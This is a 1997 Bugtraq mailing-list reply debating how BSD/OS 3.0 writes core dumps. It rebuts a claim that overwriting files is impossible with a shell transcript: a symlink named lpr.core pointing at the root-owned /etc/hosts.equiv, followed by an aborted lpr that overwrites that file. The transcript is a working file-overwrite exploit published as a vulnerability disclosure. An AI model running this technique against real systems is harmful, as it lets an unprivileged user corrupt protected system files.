Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Core file anomalies under BSDi 3.0

From: ariel () FIREBALL TAU AC IL (Ariel Biener)
Date: Fri, 20 Jun 1997 20:53:16 +0300

On Thu, 19 Jun 1997, Nir Soffer wrote:

[.snip.]

A.) BSDi doesn't give a damn that the euid!=ruid, so finding a setgid
program with priviliges isn't neccesary.

B.) BSDi _does_ however, check if the file exists, so it's quite
impossible to overwrite files.



Hmm, this is not my experience:

slingshot: {2} % id
uid=100(ariel) gid=20(staff) groups=20(staff), 0(wheel)
slingshot: {3} % ls -l /etc/hosts.equiv
-rw-------  1 root  wheel  0 Jun 20 22:43 /etc/hosts.equiv
slingshot: {4} % ln -s /etc/hosts.equiv lpr.core
slingshot: {5} % lpr
^Z
Suspended
slingshot: {6} % kill -ABRT %1
slingshot: {7} % fg
lpr
Abort (core dumped)
slingshot: {8} % ls -l /etc/hosts.equiv
-rw-------  1 root  wheel  167936 Jun 20 22:45 /etc/hosts.equiv
slingshot: {9} % su
Password:
Jun 20 22:46:34 slingshot su: ariel to root on /dev/ttyp0
slingshot: {1} % uname -a
BSD/OS slingshot.tau.ac.il 3.0 BSDI BSD/OS 3.0 Kernel #0: Mon Jun 16
19:51:22 IDT 1997
root () slingshot tau ac il:/usr/src/sys/compile/SLINGSHOT  i386

It wont work if the target file is *not* mode 0600 .

--Ariel



C.) BSDi _does_ change the permissions of the core dump to 600, and it
keeps on being owned by root, so changing the file is impossible as well.

Regards,
Nir.

--
Nir Soffer AKA ScorpioS, scorpios () cs huji ac il .
USER, n.:
        The word computer professionals use when they mean "idiot."
                -- Dave Barry, "Claw Your Way to the Top"



   +---------------------------------------------------------+
   | Ariel Biener                                            |
   | e-mail: ariel () post tau ac il        Work ph: 03-6406086 |
   +---------------------------------------------------------+
Previous By Date Next
Previous By Thread Next

Current thread: